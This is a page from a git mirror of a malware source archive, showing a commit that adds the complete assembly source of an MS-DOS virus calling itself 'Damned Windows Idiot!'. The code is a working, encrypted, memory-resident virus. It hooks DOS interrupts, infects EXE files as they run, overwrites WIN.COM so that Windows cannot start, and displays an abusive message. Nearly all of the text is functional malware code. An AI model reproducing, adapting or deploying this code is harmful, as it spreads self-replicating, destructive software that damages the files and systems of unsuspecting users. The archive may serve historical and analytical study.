daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:41:47 -06:00
committed by GitHub
parent 06c1f4dfdd
commit dc888afe59
99 changed files with 42193 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.dwi.asm
+476
View File
@@ -0,0 +1,476 @@
; [][] [] [] [][][] "Damned Windows Idiot!" or Anti-Windows...
; [] ][ [] [] []
; [] [] [] [] [] An original Viral Artform by
; [] [] [] [] [] [] AccuPunk and The Attitude Adjuster of
; [] ][ [] ][][ [] [] Virulent Graffiti, 216/513/914/602/703!
; [][] ][ ][ [][][]
; "Hey, you... with the shitty logo... Yeah, you! Get over here!"
.model tiny
.code
org 100h
id_word equ '1V' ; Marker Word
; V1 in Lil' Endian
entry:
mov bx, offset endcrypt ; Virus Start
mov cx, (end_write-endcrypt)/2 ; Ieterations
Valu:
mov dx, 0000h ; Xor Word
Crypt_Loop:
xor word ptr cs:[bx], dx ; Xor It (CS Ovr'rd)
ror word ptr cs:[bx], 1 ; Roll it Right!
inc bx
inc bx
loop Crypt_Loop
EndCrypt:
push ds es ; Save Segments
push cs cs ; CS=DS=ES
pop ds es
mov ax, 0ABCDh ; R-U-There?
int 21h
cmp ax, 6969h ; Ax=6969h Vir_Ident
jne put_vir_in_mem ; No.
exit:
pop es ds ; Restore Segments
mov ax, es ; AX = PSP segment
add ax, 10h ; Adjust for PSP
mov cx, ax
add ax, word ptr cs:[stacksave] ; Adjust SS
cli
mov sp, word ptr cs:[stacksave+2] ; Set SP
mov ss, ax ; Set SS
sti
mov bx, word ptr cs:[jmpsave+2] ; Adjust CodeSeg
add bx, cx
push bx ; Save It
mov bx, word ptr cs:[jmpsave] ; Load IP
push bx ; Save It
retf ; Exit Virus
jmpsave dd 0fff00000h ; Point to INT 20h
stacksave dd ? ; Nada.
put_vir_in_mem:
xor ax,ax ; Interrupt Table
mov ds,ax
les bx, dword ptr ds:[21h*4] ; Int 21h Vector
mov word ptr cs:[old_int_21], bx ; Save Int 21h
mov word ptr ds:[30h*4],bx ; Revector 30h
mov word ptr cs:[old_int_21+2], es
mov word ptr ds:[30h*4+2], es
push cs cs ; Restore Segments
pop es ds
mov ax, 5800h ; Get Mem Alloc
int 21h
push ax ; Save Strategy
mov bx, 2
mov ax, 5801h ; Set to Last Fit
int 21h
mov bx, ((end_vir - entry) / 16) + 1
mov ah, 48h ; Allocate Block
int 21h
push ax ; Returned in AX
sub ax, 10h ; Base Ofs 100h
mov es, ax ; Our Segment
mov di, 100h ; Entry = 100h
mov si, di ; Entry = 100h
mov cx, end_write - entry ; Bytes to Zopy
rep movsb
xor cx, cx ; Interrupt Table
push cx
pop ds
cli
mov word ptr ds:[21h*4], offset Int_21_handler ; Set Int 21h
mov word ptr ds:[21h*4+2], ax
sti
pop ax
sub ax, 1
mov es, ax ; Point To MCB
mov word ptr es:[0001], 0008 ; Config = 0008h
mov ax, 5801h ; Reset Strategy
pop bx
int 21h
jmp exit ; Exit Stub
int_21_handler:
push ax bx cx dx si di bp es ds ; Save Registers
cmp ax, 0ABCDh ; R-U-There?
je r_u_there
cmp ax, 4B00h ; DOS Exec?
je exec_call
back_to_dos:
pop ds es bp di si dx cx bx ax ; Restore Registers
db 0eah ; JMP XXXX:YYYY
old_int_21 dd ?
remove_locks:
xor ax,ax ; Interrupt Table
mov ds,ax
les ax, dword ptr cs:[Old24] ; Get Int 24h Vector
mov word ptr ds:[24h*4], Ax ; And Replace It
mov word ptr ds:[24h*4+2], Es
jmp back_to_dos
r_u_there:
mov bp, sp ; Alter AX On Stack
mov word ptr [bp+10h], 6969h
jmp end_int_21
exec_call:
xor ax,ax ; Revector Int 24h
mov ds,ax
les ax, DWord Ptr ds:[24h*4]
mov word ptr cs:[Old24], ax ; Save Old Vector
mov word ptr cs:[Old24+2], es
mov word ptr ds:[24h*4], Offset My24 ; With Our Vector
mov word ptr ds:[24h*4+2], cs
pop es ; Caller's Ds in Es
push es
mov di, dx ; ES:DI -> filename
push cs
pop ds ; DS:SI -> "WIN.COM"
mov si, offset win_com
push si
find_top:
pop si
push si
lodsb ; AL = "W"
mov cx, 128
repnz scasb ; Scan For "W"
je check_it ; Got a "W", Check It
pop si
jmp infect ; Not WIN.COM
check_it:
mov cl, 7
check_char:
lodsb ; Load Next Character
scasb ; and Check it
jne find_top ; Leave if < >
loop check_char
pop si
nuke_windows:
push es
pop ds
mov ax, 3d02h ; Open WIN.COM
int 30h
xchg ax,bx ; Handle in BX
push cs
pop ds
mov ah, 40h ; Write WIN.COM
mov cx, (my24-win_exit)-1
mov dx, offset win_exit ; with CD 20h
int 30h
mov ah, 3eh ; Close File
int 30h
mov ah, 9 ; Show User Message
mov dx, offset win_msg
int 30h
end_int_21:
pop ds es bp di si dx cx bx ax ; Restore Registers
iret
infect: ; File Infection
push es
pop ds
mov si, dx ; DS:SI -> filename
push cs
pop es
mov di, offset fname
LoopAgain: ; Copy filename into
lodsb ; Our CodeSeg.
stosb
or al,al
jnz LoopAgain
push cs ; CS=DS=ES
pop ds
xor ax, ax ; Get Attributes
call attributes
mov word ptr [fattr], cx ; Save Attributes
mov ax, 3D00h ; Open File
int 30h
jc bad_exe
xchg ax, bx ; BX = File Handle
mov ax, 5700h ; Get File Date/Time
int 30h
mov ftime, cx ; Save Time
mov fdate, dx ; And Date
mov ah, 3Fh ; Read Header
mov cx, 1ah
mov dx, offset buffer ; Into Buffer
int 30h
call LSeekEnd ; LSeek the End
push dx ; Save File Size
push ax
mov ah, 3Eh ; Close File
int 30h
cmp word ptr [buffer], 'ZM'
jne worse_exe ; Not an EXE File
cmp word ptr [buffer+12h], id_word
jne good_exe ; Not Infected
worse_exe:
pop dx ; Remove Saved File
pop dx ; Size
bad_exe:
jmp remove_locks ; Abort Infection
good_exe:
mov al, 01h ; Overwrite Attribs
xor cx, cx
call attributes
jc worse_exe ; Catch Write-Prot
; Discs Here
push cs
pop es
mov si, offset buffer + 14h ; Save Initial CS:IP
mov di, offset jmpsave ; In Segment
movsw
movsw
sub si, 10 ; Save Initial SS:SP
movsw
movsw
pop ax dx ; Retrive File Size
push ax dx ; Save It
add ax, offset end_write - offset entry
adc dx, 0
mov cx, 512 ; Pages 512 Bytes
div cx
or dx, dx
jz no_round
inc ax ; Rounding Quirk
no_round:
mov word ptr [buffer + 4], ax ; Set Total 512 pages
mov word ptr [buffer + 2], dx ; Set Total mod 512
mov ax, word ptr [buffer + 0Ah] ; Get Minimum
add ax, (end_write - entry)/16 ; Add our Size
mov word ptr [buffer + 0ah], ax ; Put us in Minimum
mov word ptr [buffer + 0ch], ax ; and in the Maximum
pop dx ax ; Retrieve File Size
mov cl, 4
mov bx, word ptr [buffer + 8]
shl bx, cl ; BX = Header Size
sub ax, bx
sbb dx, 0 ; Subtract Header
mov cx, 10h
div cx ; Change To Para/Rem
or dx, dx
jz no_padding
sub cx, dx ; CX = Bytes to Pad
inc ax
no_padding:
push cx ; Save Pad Bytes
sub ax, 10h
mov word ptr [buffer + 14h], offset entry ; Set IP
mov word ptr [buffer + 16h], ax ; Set CS
mov word ptr [buffer + 0Eh], ax ; Set SS
mov word ptr [buffer + 10h], offset end_vir+100h ; Set SP
move_id:
mov word ptr [buffer + 12h], id_word ; Set ID Word
; Negative Checksum
mov ax, 3D02h ; Open File
mov dx, offset fname
int 30h
xchg ax, bx ; BX = File Handle
mov ah, 40h ; Write File
mov cx, 1Ah
mov dx, offset buffer
int 30h
call LSeekEnd ; LSeek to End
pop cx ; Retrieve Padding
cmp cx, 16
je no_fixup ; None Needed
mov ah, 40h ; Write File
int 30h
no_fixup:
mov ah, 2ch ; Get Time
int 21h
mov word ptr [Valu+1], Dx ; New Crypt Valu
mov si, offset writeret ; Copy Write
mov di, offset tempcrypt ; Routine
mov cx, (end_write-writeret)
rep movsb
call tempcrypt ; Call Write Routine
mov ax, 5701h ; Set File Time/Date
mov cx, ftime
mov dx, fdate
int 30h
mov ah, 3Eh ; Close File
int 30h
mov al, 01h ; Reset Attribs
mov cx, fattr
call attributes
jmp remove_locks ; Remove Int 24h
vir_ident db 0,'[DWI] AccuPunk/' ; Virus and Author
db 'The Attitude Adjuster' ; Idents
vir_group db 0,'Virulent Graffiti',0 ; Group Ident
win_com db 'WIN.COM',0 ; Target File
win_exit db 0cdh, 20h ; DOS Exit
win_msg db 0dh,0ah ; Message
db 'You''ve been caught, you DWI! You''re nothing '
db 'but a Damn Windows Idiot!',0dh,0ah
db 'Well, we at Virulent Graffiti have had it... '
db 'you''re not going to be',0dh,0ah
db 'running that bullshit for a while, ''cuz, hey, '
db 'friends don''t let friends',0dh,0ah
db 'use Windows! (and you''re damn right we''re '
db 'your friends!)',0dh,0ah,'$'
my24: ; Error Handler
mov al, 3 ; Process Terminate
iret
Attributes: ; Get/Set
mov ah, 43h
mov dx, offset fname
int 30h
ret
LSeekEnd:
mov ax, 4202h ; LSeek from End
xor cx, cx
cwd ; XOR DX, DX
int 30h ; Kudos DA
ret
WriteRet:
push bx ; Handle
mov bx, offset endcrypt ; Virus Start
mov cx, (end_write-endcrypt)/2 ; Ieterations
mov dx, Word Ptr [Valu+1] ; Xor Word
Crypt_Loop2:
rol word ptr [bx], 1 ; Roll it Left!
xor word ptr [bx], dx ; Xor It
inc bx
inc bx
loop Crypt_Loop2
pop bx ; Handle
mov ah, 40h ; Write File
mov cx, end_write - entry
mov dx, offset entry
int 30h
push bx ; Handle
mov bx, offset endcrypt ; Virus Start
mov cx, (end_write-endcrypt)/2 ; Ieterations
mov dx, Word Ptr [Valu+1] ; Xor Word
Crypt_Loop3:
xor word ptr [bx], dx ; Xor It
ror word ptr [bx], 1 ; Roll it Left!
inc bx
inc bx
loop Crypt_Loop3
pop bx ; Handle
ret ; Return
end_write:
old24 dd 0 ; Int 24h Vector
buffer db 1Ah dup (0) ; EXE Read Buffer
fname db 128 dup (0) ; Filename Buffer
fdate dw 0 ; OldFileDate
ftime dw 0 ; OldFileTime
fattr dw 0 ; OldFileAttr
tempcrypt:
db (end_write-writeret) Dup(0) ; Write Routine
end_vir:
end entry